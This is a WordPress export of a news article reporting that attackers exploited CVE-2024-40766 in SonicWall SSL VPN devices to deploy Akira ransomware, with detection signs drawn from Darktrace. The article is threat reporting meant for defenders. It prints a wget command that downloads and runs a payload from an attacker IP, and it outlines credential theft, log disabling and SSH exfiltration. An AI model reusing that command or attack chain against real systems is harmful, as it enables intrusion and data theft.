{"id":7598,"date":"2025-10-11T10:03:56","date_gmt":"2025-10-11T10:03:56","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/11\/threat-actors-exploiting-sonicwall-ssl-vpn-devices-in-wild-to-deploy-akira-ransomware\/"},"modified":"2025-10-11T10:03:56","modified_gmt":"2025-10-11T10:03:56","slug":"threat-actors-exploiting-sonicwall-ssl-vpn-devices-in-wild-to-deploy-akira-ransomware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/11\/threat-actors-exploiting-sonicwall-ssl-vpn-devices-in-wild-to-deploy-akira-ransomware\/","title":{"rendered":"Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware"},"content":{"rendered":"<p>    Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances to deploy Akira ransomware on enterprise networks.<\/p>\n<p>Beginning in July, multiple incidents of initial access via unpatched SonicWall devices were reported across North America and EMEA. Attackers exploited CVE-2024-40766, an access control flaw in SonicOS versions up to 7.0.1-5035, enabling unauthenticated remote code execution.<\/p>\n<p>Once inside a network, adversaries performed reconnaissance, credential harvesting, and lateral movement before detonating the <a href=\"https:\/\/cybersecuritynews.com\/catb-ransomware-leveraging-microsoft-distributed-transaction-coordinator\/\" target=\"_blank\" rel=\"noreferrer noopener\">ransomware payload<\/a>.<\/p>\n<p>By August, the pace of attacks accelerated, with affected organizations spanning manufacturing, education, and healthcare sectors.<\/p>\n<p>Data exfiltration often preceded encryption, with threat actors siphoning sensitive files to rare external SSH endpoints before network encryption commenced.<\/p>\n<p>Darktrace analysts <a href=\"https:\/\/www.darktrace.com\/blog\/inside-akiras-sonicwall-campaign-darktraces-detection-and-response\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> multiple signs of compromise, including anomalous DCE-RPC requests to the epmapper service and unexpected WinRM sessions to domain controllers, long before ransom notes appeared.<\/p>\n<p>Their Managed Detection and Response (MDR) platform linked these early indicators to the broader Akira campaign, enabling rapid incident triage and containment.<\/p>\n<p>The Akira ransomware strain, first observed in March 2023, has evolved from Windows-only targeting to include Linux variants affecting VMware ESXi hosts, making it an attractive option for attackers seeking maximum disruption.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjzh8Z4ySRpJoOfzcNIW_nhpiMNfAqxM73ggHx1C6xBvtD4hc5XyBhCt62-NGP95JCtdgA2jbMYLDSGNAgh-rRrs48zR31mxnnZyRFIg0JZq1BJ7eXyJExLbE4NvKafLPGYUC5M5FmH9BqQgaIWVTzn1PcW3lyBvH95cSs-ITTB3hWpZx_aFuLpMkUx-Qk\/s16000\/Flowchart%2520of%2520Kerberos%2520PKINIT%2520pre-authentication%2520and%2520U2U%2520authentication%2520%28Source%2520-%2520Darktrace%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Flowchart of Kerberos PKINIT pre-authentication and U2U authentication (Source \u2013 Darktrace)<\/figcaption><\/figure>\n<\/div>\n<p>Under its <a href=\"https:\/\/cybersecuritynews.com\/ransomware-as-a-service-raas-evolved-as-a-predominant-framework\/\" target=\"_blank\" rel=\"noreferrer noopener\">Ransomware-as-a-Service<\/a> model, affiliates deploy double-extortion tactics, encrypting file systems and threatening public release of exfiltrated data.<\/p>\n<p>In each SonicWall SSD VPN compromise, operators ensured persistence by reusing stolen credentials and exploiting misconfigurations in Virtual Office Portal setups, bypassing multi-factor configurations even on patched devices.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism\"><strong>Infection Mechanism<\/strong><\/h2>\n<p>The initial compromise typically begins with exploitation of CVE-2024-40766 in SonicWall SSL VPN.<\/p>\n<p>Attackers send crafted HTTP requests to the vulnerable <code>login.host<\/code> endpoint, bypassing authentication controls.<\/p>\n<p>Once a foothold is established, a malicious payload named <code>vmwaretools<\/code> is downloaded from a hostile cloud endpoint using a simple <code>wget<\/code> command:-<\/p>\n<pre class=\"wp-block-code\"><code>wget http[:]\/\/137.184.243.69\/vmwaretools - O \/ tmp \/ vmwaretools\nchmod + x \/ tmp \/ vmwaretools\n\/ tmp \/ vmwaretools<\/code><\/pre>\n<p>This payload installs a loader that registers a backdoor service and harvests administrative credentials via Kerberos PKINIT and UnPAC-the-hash techniques, extracting NTLM hashes without triggering standard <a href=\"https:\/\/cybersecuritynews.com\/credential-theft-risks\/\" target=\"_blank\" rel=\"noreferrer noopener\">credential audit<\/a> logs.<\/p>\n<p>After credential extraction, operators initiate lateral movement to ESXi servers over RDP and SSH, exfiltrate data via SSH to endpoint 66.165.243.39, then execute the ransomware binary on Windows and ESXi hosts.<\/p>\n<p>Maintaining stealth, the loader disables local logging and leverages legitimate administrative tools such as WinRM and Rclone for intra-network communication.<\/p>\n<p>By the time encryption begins, attackers have already ensured persistence through backdoored services and stolen credentials for future access.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhruSH9YUhyphenhyphenBq22o0tx92ZIz57e8C0djHmsN2JIiK4U97jpg4kk-A_PUNyXbL94mh1_PoveOjFQ-ov4TZhfvzfRRYaic0hB4q5-M9BRZQ8C5Q_ssPLs-4MSaQ3KHuSwD3yJESJcnvab9VatSqwSi8NH2nCQ-5f0swJbAphRtwnFYC8KRfVtIQ20D7DxoUA\/s16000\/Geographical%2520distribution%2520of%2520organization%25E2%2580%2599s%2520affected%2520by%2520Akira%2520ransomware%2520in%25202025%2520%28Source%2520-%2520Darktrace%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Geographical distribution of organization\u2019s affected by Akira ransomware in 2025 (Source \u2013 Darktrace)<\/figcaption><\/figure>\n<\/div>\n<p>Organizations are urged to apply <a href=\"https:\/\/cybersecuritynews.com\/sonicwall-n-day-vulnerabilities\/\" target=\"_blank\" rel=\"noreferrer noopener\">SonicWall<\/a> patches released in August 2024, enforce strict credential hygiene, and monitor for anomalous external SSH traffic.<\/p>\n<p>Early detection of unusual DCE-RPC, WinRM, and certificate download events remains critical to disrupting this evolving Akira campaign.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/threat-actors-exploiting-sonicwall-ssl-vpn-devices\/\">Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/threat-actors-exploiting-sonicwall-ssl-vpn-devices\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances to deploy Akira ransomware on enterprise networks. Beginning in July, multiple incidents of initial access via unpatched SonicWall devices were reported across North America and EMEA. Attackers [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7598","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7598"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7598"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7598\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}